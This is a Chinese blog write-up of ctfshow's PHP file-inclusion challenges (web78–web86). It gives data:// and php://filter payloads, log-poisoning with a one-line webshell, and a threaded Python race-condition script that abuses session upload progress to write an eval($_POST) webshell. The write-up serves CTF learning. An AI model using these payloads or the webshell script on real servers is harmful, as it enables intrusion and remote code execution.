ctfshow之文件包含(web78~web86)

最新推荐文章于 2024-10-06 11:52:56 发布
最新推荐文章于 2024-10-06 11:52:56 发布
阅读量616 收藏 4
点赞数 4
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74350234/article/details/141831582
版权

web78


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解法一:data伪协议

?file=data://text/plain,<?php system("tac flag.php");

 解法二:php:filter伪协议

?file=pHp://FilTer/convert.base64-encode/resource=flag.php 

 解法三:日志注入一句话木马

先在User-Agent处传参执行,从而让日志文件包含执行记录,一句话木马就写到日志文件上了

 file指向到日志文件,POST传参数a

注意:这里本来想试下参数逃逸的,本质上也是使用伪协议,但这里被禁用了 这里用input伪协议也不行

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

 这里有对php的过滤;

解法一:data伪协议

?file=data://text/plain,<?= system("tac flag.???");?> 

解法二:日志文件注入

web80 

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php和data,这样data伪协议用不了了 

解法:日志文件注入

只不过flag不在flag.php中,而是藏在fl0g.php

 web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

 同样是日志文件注入

web82~web86

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

脚本代码:

import requests
import io
import threading


url='http://b04c7980-d374-4c39-9ebc-a612708262c8.challenge.ctf.show/'
sessionid='ctfshow'
data={
	"1":"file_put_contents('/var/www/html/muma.php','<?php eval($_POST[a]);?>');"
}  

'''
post 传递内容可在网站目录下写入一句话木马。
根据资料,内容暂存在 /tmp/ 目录下 sess_sessionid 文件。
sessionid 可控,所以这里即 /tmp/sess_ctfshow。
这样一旦访问成功,就说明木马植入了
'''


# /tmp/sess_sessionid 中写入一句话木马。
def write(session):  
	fileBytes = io.BytesIO(b'a'*1024*50)
	while True:
		response=session.post(
			url,
			data={
			'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
			},
			cookies={
			'PHPSESSID':sessionid
			},
			files={
			'file':('ctfshow.jpg',fileBytes)
			}
			)


# 访问 /tmp/sess_sessionid,post 传递信息,保存新木马。
def read(session):
	while True:
		response=session.post(
			url+'?file=/tmp/sess_'+sessionid,
	        data=data,
			cookies={
			'PHPSESSID':sessionid
			}
			)
		# 访问木马文件,如果访问到了就代表竞争成功
		resposne2=session.get(url+'muma.php')
		if resposne2.status_code==200:
			print('++++++done++++++')
		else:
			print(resposne2.status_code)

if __name__ == '__main__':

	evnet=threading.Event()
	# 写入和访问分别设置 5 个线程。
	with requests.session() as session:
		for i in range(5):
			threading.Thread(target=write,args=(session,)).start()
		for i in range(5):
			threading.Thread(target=read,args=(session,)).start()

	evnet.set()

 

 

pink鱼
关注
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3057
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
ctfshow web入门文件包含82-86
xiaolong22333的博客
12-14 2388
知识点: 利用session.upload_progress进行文件包含 条件竞争 思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透 其中主要的几点 首先上传PHP_SESSION_UPLOAD_PROGRESS,代码如下 <!DOCTYPE html> <html> <body> <f
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1813
ctfshow学习记录-web入门(文件包含web78-87)
ctfshow web80-88
weixin_58519918的博客
04-19 3716
web(80) 构建/?file=Php://input post: <?php system("tac fl0g.php")?>【php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。】 因为我在网上看大部分都使用burp来解决这个题目,然后我的burp他在虚拟机里面一直没有落实在本机
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1079
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
ctfshow-web入门-文件包含web82-web86)条件竞争实现session会话文件包含
Welcome To Myon'Blog !
07-05 1725
file_get_contents 函数将会读取文件的全部内容并将其作为字符串返回,strpos($content, "
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 842
只是过滤了分号,其他同上。php的最后一个分号可以省略。
CTFshow 文件包含 web80
Kradress的博客
12-08 920
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow 文件上传 web162
Kradress的博客
02-15 2151
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFshow 文件包含 web79
Kradress的博客
12-07 698
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
Web】CTFSHOW PHP文件包含刷题记录(全)
uuzeray的博客
01-11 1431
温故知新。
CTFshow_web入门_文件包含
ScyLamb的博客
03-09 1107
文件包含 文章目录文件包含0x00 web780x01 web790x02 web800x03 web810x04 web820x05 web830x06 web840x07 web850x08 web860x09 web870x0A web880x0B web1160x0C web117 0x00 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); 无过滤 ?file=php://filter/
CTFSHOW WEB入门——命令执行
Chur的博客
10-09 1179
ctfshow 靶场 web入门 命令执行系列
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4208
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2734
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1270
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
Linux的基本指令(2)
shylyly_的博客
10-01 1045
Linux的基本指令(2) man nano cp mv which 自制指令 alias echo cat tac > >> < more less head tail |(管道)
linux之curl
最新发布
qq_41081716的博客
10-06 313
发送指定的数据作为POST请求的主体。数据可以是键值对的形式。: 添加自定义HTTP头部。可以多次使用以添加多个头部。: 用于发送表单数据,特别是文件上传。: 指定请求方法,例如。
ctfshow web入门文件包含
05-24
2. Robots.txt文件:该文件包含网站的爬虫指令,告诉爬虫哪些页面可以被访问,哪些不可以。 3. .htaccess文件:该文件包含了一些服务器配置信息,比如重定向和安全设置等。 4. 网站地图:该文件列出了网站的所有页面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值